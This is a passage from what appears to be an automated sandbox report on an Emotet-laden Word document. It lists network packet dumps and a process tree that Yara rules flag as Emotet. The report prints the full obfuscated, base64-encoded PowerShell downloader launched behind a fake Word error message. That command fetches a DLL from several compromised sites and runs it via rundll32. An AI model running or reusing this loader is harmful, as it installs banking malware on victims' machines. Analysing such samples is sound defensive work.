de 6e ad d9 bb b6 a7 bf 37 f6 02 b7 65 40 31 17 3e a9 c2 65 71 58 b6 b3 98 76 8f cf 4e 69 e5 3f 88 7e 99 7a d9 26 8c 18 94 39 4d 6d 5a f1 75 fe b0 6e 0a 9f e9 af ba 69 d7 0d ba 2d fc 2f ed 7d 27 a7 74 9e 36 9e f0 50 a4 ce 3a 02 2e 03 97 70 6a e0 a0 ad e2 ce 83 0a 13 f7 10 34 70 cf 13 5f d2 07 c1 85 cb d2 cb ed b1 fb 23 5b 42 a4 eb 79 82 e8 3b 98 17 28 d0 63 68 34 52 f4 ac 8f be 78 bd 69 14 f8 fb 3a 3a c5 93 ea 61 8e 8d 53 2e 14 84 0f c9 fd 1e ee c6 5d d2 c5 24 22 88 37 b3 a5 44 ae 54 bf aa 2c ce 4f c6 48 91 79 45 7b 06 2f 3c ca 3a 91 0a 59 c8 07 79 58 0b bf df 33 c8 39 01 e7 ca 95 e6 5b ab a5 ed e4 c3 8d f8 10 b3 85 76 75 12 a1 9f 0c 7e 17 a1 3d 0a 21 3e 3e ec 5e ec de b1 33 57 d4 a6 18 ed 7a 5e f6 8b a0 8f 33 e5 84 da 17 95 06 c6 81 5a 2a b0 41 b2 1e 5a e5 3a 82 b7 91 c0 9b 33 54 e9 66 77 f3 2d a6 0e 79 d0 96 f8 93 31 ce 42 a3 1f c1 b3 c7 dc cc 1a 42 98 a6 46 a0 b1 61 88 32 4a c8 dc 3b Data Ascii: 584rG."g]]_ m>{~Wu~d>Ht}H&vG\|JT{+2#kqHNu\|B^(v`!/5IJ^,z[`k:-DXiD/S3pc2)S2AwA b>9(km9gdDF`P`R/Kxlm8-km+\|f0s.9Z2[#pSaHf;gxsc$vw-~ze!}Eiul7+R yX+aSY\JmzHzU=9%\|27crs$#BMoLH{q5.q%SF#.9g\E~OBH5hP#@5N\|!Gf<Q%tBss{kA\#%@W~Weg2v{(0^aQQLs^B-Z%f3P>z:z 5~0w#zytE=?MJ'hW8f. >R\\|#^fnvJ[ /Y%W mu:'fb\|tz~5?/hn7e@1>eqXvNi?~z&9MmZuni-/}'t6P:.pj4p_#[By;(ch4Rxi::aS.]$"7DT,OHyE{/<:YyX39[vu~=!>>^3Wz^3Z*AZ:3Tfw-y1BBFa2J;
Jan 7, 2021 18:44:47.754307032 CET	238	IN	Data Raw: 94 98 62 9f 6f 26 2d 62 ce f4 13 b6 d9 0d 90 40 3f fd b5 a6 49 6b d2 96 99 9d c3 8f 14 14 52 ec 45 fa af 83 c8 f1 ec 59 13 cb 4b cc 57 3e 8d 72 07 13 18 a9 82 60 d5 29 17 b9 0b 01 65 26 ba 6a 51 36 2e 4c e6 f3 5c 42 a3 02 0e de be c8 74 5d 6a ba Data Ascii: bo&-b@?IkREYKW>r`)e&jQ6.L\Bt]joC. *GsU~U:\36T-`@&Cm.u{TM15^'@P#W'$Fc: B\|]0!~`}/RovQ3!cj7f<oL

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2364 Parent PID: 584

General

Start time:	18:44:35
Start date:	07/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f780000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2412 Parent PID: 1220

General

Start time:	18:44:37
Start date:	07/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA
Imagebase:	0x4a7b0000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msg.exe PID: 2420 Parent PID: 2412

General

Start time:	18:44:38
Start date:	07/01/2021
Path:	C:\Windows\System32\msg.exe
Wow64 process (32bit):	false
Commandline:	msg user /v Word experienced an error trying to open the file.
Imagebase:	0xff440000
File size:	26112 bytes
MD5 hash:	2214979661E779C3E3C33D4F14E6F3AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 1976 Parent PID: 2412

General

Start time:	18:44:38
Start date:	07/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA
Imagebase:	0x13fda0000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2098977444.00000000003A6000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2099018850.0000000001BC6000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2484 Parent PID: 1976

General

Start time:	18:44:46
Start date:	07/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Imagebase:	0xffaf0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2764 Parent PID: 2484

General

Start time:	18:44:46
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
Imagebase:	0x1e0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2100881704.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2812 Parent PID: 2764

General

Start time:	18:44:47
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL
Imagebase:	0x1e0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2102822583.0000000000300000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2688 Parent PID: 2812

General

Start time:	18:44:47
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL
Imagebase:	0x1e0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2103779024.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2732 Parent PID: 2688

General

Start time:	18:44:48
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL
Imagebase:	0x1e0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2105243347.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2824 Parent PID: 2732

General

Start time:	18:44:49
Start date:	07/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL
Imagebase:	0x1e0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
